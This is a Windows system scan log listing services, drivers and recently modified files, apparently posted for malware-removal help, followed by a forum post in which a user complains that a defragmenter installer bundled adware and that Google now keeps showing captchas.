S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2014-12-11 315496]
S2 SurfShieldUpdateService;Update Service for SurfShield;"C:\Program Files (x86)\SurfShieldMain\UpdateService.exe" --> C:\Program Files (x86)\SurfShieldMain\UpdateService.exe [?]
S2 vToolbarUpdater18.0.5;vToolbarUpdater18.0.5;C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.5\ToolbarUpdater.exe [2014-3-20 1771032]
S3 athrusb;Atheros Wireless LAN USB device driver;C:\windows\System32\drivers\athrxusb.sys [2008-7-28 1075712]
S3 fssfltr;fssfltr;C:\windows\System32\drivers\fssfltr.sys [2014-11-28 58056]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2014-3-31 1512640]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\windows\System32\ieetwcollector.exe [2015-9-8 114688]
S3 lvpopf64;Logitech POP Suppression Filter;C:\windows\System32\drivers\lvpopf64.sys [2007-5-11 1361952]
S3 LVPr2M64;Logitech LVPr2M64 Driver;C:\windows\System32\drivers\LVPr2M64.sys [2009-10-7 30232]
S3 LVUSBS64;Logitech USB Monitor Filter;C:\windows\System32\drivers\LVUSBS64.sys [2007-5-11 50208]
S3 LVUVC64;Logitech QuickCam Fusion(UVC);C:\windows\System32\drivers\lvuvc64.sys [2007-5-11 3612704]
S3 panda_url_filteringd;panda_url_filteringd driver;C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringd.sys [2014-3-19 51288]
S3 PSKMAD;PSKMAD;C:\windows\System32\drivers\PSKMAD.sys [2015-6-6 61712]
S3 RTL8023x64;Realtek 10/100 NIC Family NDIS x64 Driver;C:\windows\System32\drivers\Rtnic64.sys [2009-6-10 51712]
S3 SuperIO;Lenovo ASD HWM Driver;C:\windows\System32\drivers\spio.sys [2009-6-5 11848]
S3 TsUsbFlt;TsUsbFlt;C:\windows\System32\drivers\TsUsbFlt.sys [2011-6-23 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\windows\System32\drivers\usbaapl64.sys [2014-7-28 54784]
S3 UsbFltr;WayTech USB Filter Driver;C:\windows\System32\drivers\UsbFltr.sys [2007-4-9 12288]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\windows\System32\Wat\WatAdminSvc.exe [2011-4-2 1255736]
S3 wsvd;wsvd;C:\windows\System32\drivers\wsvd.sys [2009-7-21 121840]
S3 yukonw7;NDIS6.2 Miniport Driver for Marvell Yukon Ethernet Controller;C:\windows\System32\drivers\yk62x64.sys [2009-6-10 389120]
S3 ZDCNDIS6a64;ZDCNDIS Protocol Driver;C:\windows\System32\ZDCNDIS6a64.sys [2011-10-20 41280]
S4 rqpbhevlkc64;rqpbhevlkc64;C:\Program Files\004\rqpbhevlkc64.exe run options=01100010040000000000000000000000 sourceguid=7B0A8368-1A6F-48A5-B236-8BD61816B3F9 --> C:\Program Files\004\rqpbhevlkc64.exe run options=01100010040000000000000000000000 sourceguid=7B0A8368-1A6F-48A5-B236-8BD61816B3F9 [?]
.
=============== Created Last 30 ================
.
2015-09-08 11:42:01 -------- d--h--w- C:\$Windows.~BT
2015-09-08 06:43:30 774656 ----a-w- C:\windows\System32\invagent.dll
2015-09-08 06:43:30 743424 ----a-w- C:\windows\System32\generaltel.dll
2015-09-08 06:43:30 69120 ----a-w- C:\windows\System32\acmigration.dll
2015-09-08 06:43:30 437760 ----a-w- C:\windows\System32\devinv.dll
2015-09-08 06:43:30 1148416 ----a-w- C:\windows\System32\aeinv.dll
2015-09-08 06:43:30 1116672 ----a-w- C:\windows\System32\appraiser.dll
2015-09-08 06:43:29 227328 ----a-w- C:\windows\System32\aepdu.dll
2015-09-08 06:43:29 17344 ----a-w- C:\windows\System32\CompatTelRunner.exe
2015-09-08 06:41:59 815312 ----a-w- C:\Program Files (x86)\Internet Explorer\iexplore.exe
2015-09-08 06:32:54 11745192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{3C665416-5FAB-42FE-BA2F-A8A0DC018335}\mpengine.dll
2015-09-07 22:56:09 -------- d-----w- C:\Program Files\Common Files\AV
.
==================== Find3M ====================
.
2015-08-26 07:22:17 778440 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2015-08-26 07:22:16 142536 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-30 18:06:57 2565120 ----a-w- C:\windows\System32\d3d10warp.dll
2015-07-30 18:06:57 1648128 ----a-w- C:\windows\System32\DWrite.dll
2015-07-30 18:06:57 1180160 ----a-w- C:\windows\System32\FntCache.dll
2015-07-30 18:06:42 41984 ----a-w- C:\windows\System32\lpk.dll
2015-07-30 18:06:39 100864 ----a-w- C:\windows\System32\fontsub.dll
2015-07-30 18:06:35 14336 ----a-w- C:\windows\System32\dciman32.dll
2015-07-30 18:06:34 46080 ----a-w- C:\windows\System32\atmlib.dll
2015-07-30 17:57:30 1987584 ----a-w- C:\windows\SysWow64\d3d10warp.dll
2015-07-30 17:57:30 1251328 ----a-w- C:\windows\SysWow64\DWrite.dll
2015-07-30 17:57:08 70656 ----a-w- C:\windows\SysWow64\fontsub.dll
2015-07-30 17:57:05 10240 ----a-w- C:\windows\SysWow64\dciman32.dll
2015-07-30 17:57:02 34304 ----a-w- C:\windows\SysWow64\atmlib.dll
2015-07-30 17:55:56 25600 ----a-w- C:\windows\SysWow64\lpk.dll
2015-07-30 16:56:07 3208192 ----a-w- C:\windows\System32\win32k.sys
2015-07-30 16:52:53 372736 ----a-w- C:\windows\System32\atmfd.dll
2015-07-30 16:49:55 299520 ----a-w- C:\windows\SysWow64\atmfd.dll
2015-07-20 18:12:45 98304 ----a-w- C:\windows\System32\wudriver.dll
2015-07-20 18:12:45 3154944 ----a-w- C:\windows\System32\wucltux.dll
2015-07-20 18:12:45 192000 ----a-w- C:\windows\System32\wuwebv.dll
2015-07-20 18:12:16 91136 ----a-w- C:\windows\System32\WinSetupUI.dll
2015-07-20 18:12:05 12288 ----a-w- C:\windows\System32\wu.upgrade.ps.dll
2015-07-20 18:12:02 37376 ----a-w- C:\windows\System32\wuapp.exe
2015-07-20 17:56:49 93184 ----a-w- C:\windows\SysWow64\wudriver.dll
2015-07-20 17:56:49 173056 ----a-w- C:\windows\SysWow64\wuwebv.dll
2015-07-20 17:56:08 34816 ----a-w- C:\windows\SysWow64\wuapp.exe
2015-07-16 20:54:49 2724864 ----a-w- C:\windows\System32\mshtml.tlb
2015-07-16 20:54:33 4096 ----a-w- C:\windows\System32\ieetwcollectorres.dll
2015-07-16 20:37:26 66560 ----a-w- C:\windows\System32\iesetup.dll
2015-07-16 20:36:31 48640 ----a-w- C:\windows\System32\ieetwproxystub.dll
2015-07-16 20:36:22 417792 ----a-w- C:\windows\System32\html.iec
2015-07-16 20:36:21 584192 ----a-w- C:\windows\System32\vbscript.dll
2015-07-16 20:35:40 88064 ----a-w- C:\windows\System32\MshtmlDac.dll
2015-07-16 20:26:00 5923328 ----a-w- C:\windows\System32\jscript9.dll
2015-07-16 20:21:50 114688 ----a-w- C:\windows\System32\ieetwcollector.exe
2015-07-16 20:21:47 144384 ----a-w- C:\windows\System32\ieUnatt.exe
2015-07-16 20:21:25 814080 ----a-w- C:\windows\System32\jscript9diag.dll
2015-07-16 20:12:23 968704 ----a-w- C:\windows\System32\MsSpellCheckingFacility.exe
2015-07-16 20:06:43 2724864 ----a-w- C:\windows\SysWow64\mshtml.tlb
2015-07-16 20:00:07 77824 ----a-w- C:\windows\System32\JavaScriptCollectionAgent.dll
2015-07-16 19:51:47 504320 ----a-w- C:\windows\SysWow64\vbscript.dll
2015-07-16 19:51:46 62464 ----a-w- C:\windows\SysWow64\iesetup.dll
2015-07-16 19:50:54 47616 ----a-w- C:\windows\SysWow64\ieetwproxystub.dll
2015-07-16 19:50:38 341504 ----a-w- C:\windows\SysWow64\html.iec
2015-07-16 19:49:37 64000 ----a-w- C:\windows\SysWow64\MshtmlDac.dll
2015-07-16 19:39:20 115712 ----a-w- C:\windows\SysWow64\ieUnatt.exe
2015-07-16 19:38:51 620032 ----a-w- C:\windows\SysWow64\jscript9diag.dll
2015-07-16 19:33:23 1359360 ----a-w- C:\windows\System32\mshtmlmedia.dll
2015-07-16 19:32:53 2125824 ----a-w- C:\windows\System32\inetcpl.cpl
2015-07-16 19:24:03 60416 ----a-w- C:\windows\SysWow64\JavaScriptCollectionAgent.dll
2015-07-16 19:12:42 2427904 ----a-w- C:\windows\System32\wininet.dll
2015-07-16 19:12:39 4520448 ----a-w- C:\windows\SysWow64\jscript9.dll
2015-07-16 19:06:06 2052608 ----a-w- C:\windows\SysWow64\inetcpl.cpl
2015-07-16 19:05:15 1155072 ----a-w- C:\windows\SysWow64\mshtmlmedia.dll
2015-07-16 18:42:02 1951232 ----a-w- C:\windows\SysWow64\wininet.dll
2015-07-15 03:19:57 2004992 ----a-w- C:\windows\System32\msxml6.dll
2015-07-15 03:19:57 1887232 ----a-w- C:\windows\System32\msxml3.dll
2015-07-15 03:14:09 2048 ----a-w- C:\windows\System32\msxml6r.dll
2015-07-15 03:13:59 2048 ----a-w- C:\windows\System32\msxml3r.dll
2015-07-15 02:55:45 1390592 ----a-w- C:\windows\SysWow64\msxml6.dll
2015-07-15 02:55:45 1241088 ----a-w- C:\windows\SysWow64\msxml3.dll
2015-07-15 02:51:14 2048 ----a-w- C:\windows\SysWow64\msxml6r.dll
2015-07-15 02:51:14 2048 ----a-w- C:\windows\SysWow64\msxml3r.dll
2015-07-10 17:51:27 44032 ----a-w- C:\windows\System32\tsgqec.dll
2015-07-10 17:51:19 3722752 ----a-w- C:\windows\System32\mstscax.dll
2015-07-10 17:51:10 158720 ----a-w- C:\windows\System32\aaclient.dll
2015-07-10 17:34:09 36864 ----a-w- C:\windows\SysWow64\tsgqec.dll
2015-07-10 17:34:02 3221504 ----a-w- C:\windows\SysWow64\mstscax.dll
2015-07-10 17:33:50 131584 ----a-w- C:\windows\SysWow64\aaclient.dll
2015-07-09 17:57:57 193536 ----a-w- C:\windows\System32\notepad.exe
2015-07-09 17:57:57 193536 ----a-w- C:\windows\notepad.exe
2015-07-09 17:42:27 179712 ----a-w- C:\windows\SysWow64\notepad.exe
2015-07-04 18:07:11 2087424 ----a-w- C:\windows\System32\ole32.dll
2015-07-04 17:48:36 1414656 ----a-w- C:\windows\SysWow64\ole32.dll
2015-07-01 20:56:03 95680 ----a-w- C:\windows\System32\drivers\ksecdd.sys
2015-07-01 20:56:03 155584 ----a-w- C:\windows\System32\drivers\ksecpkg.sys
2015-07-01 20:49:56 260096 ----a-w- C:\windows\System32\WebClnt.dll
2015-07-01 20:49:53 210944 ----a-w- C:\windows\System32\wdigest.dll
2015-07-01 20:49:47 86528 ----a-w- C:\windows\System32\TSpkg.dll
2015-07-01 20:49:45 29184 ----a-w- C:\windows\System32\sspisrv.dll
2015-07-01 20:49:45 136192 ----a-w- C:\windows\System32\sspicli.dll
2015-07-01 20:49:42 342016 ----a-w- C:\windows\System32\schannel.dll
2015-07-01 20:49:42 28160 ----a-w- C:\windows\System32\secur32.dll
2015-07-01 20:49:41 1216512 ----a-w- C:\windows\System32\rpcrt4.dll
2015-07-01 20:49:23 309760 ----a-w- C:\windows\System32\ncrypt.dll
2015-07-01 20:49:22 315392 ----a-w- C:\windows\System32\msv1_0.dll
2015-07-01 20:49:11 729088 ----a-w- C:\windows\System32\kerberos.dll
2015-07-01 20:49:11 1461760 ----a-w- C:\windows\System32\lsasrv.dll
2015-07-01 20:48:36 102912 ----a-w- C:\windows\System32\davclnt.dll
2015-07-01 20:48:34 44032 ----a-w- C:\windows\System32\cryptbase.dll
2015-07-01 20:48:34 22016 ----a-w- C:\windows\System32\credssp.dll
2015-07-01 20:47:38 31232 ----a-w- C:\windows\System32\lsass.exe
2015-07-01 20:47:18 64000 ----a-w- C:\windows\System32\auditpol.exe
2015-07-01 20:43:51 60416 ----a-w- C:\windows\System32\msobjs.dll
2015-07-01 20:43:37 146432 ----a-w- C:\windows\System32\msaudite.dll
2015-07-01 20:39:24 686080 ----a-w- C:\windows\System32\adtschema.dll
2015-07-01 20:30:43 206848 ----a-w- C:\windows\SysWow64\WebClnt.dll
2015-07-01 20:30:43 172032 ----a-w- C:\windows\SysWow64\wdigest.dll
2015-07-01 20:30:40 65536 ----a-w- C:\windows\SysWow64\TSpkg.dll
.
============= FINISH: 21:00:35.87 ===============


Google keeps asking me to enter a Captcha

OK, this is annoying. I just did a clean install on my laptop, and the last thing I installed is the Auslogics Disk Defragmenter suggested by this forum... It is a good defragmenter, but I've downloaded the new version and it installed adware along with it... The reason I know is because when I start my PC, a software called BoostSpeed is installed, and I already got it uninstalled, and next... Google kept asking me to enter a captcha due to traffic, which I don't know from where... So how to solve this? Damn, I'm so mad!! I've wasted my time formatting and cleaning and trying to install the updated version of the application, and this is what I got :( Damn Auslogics! :angry: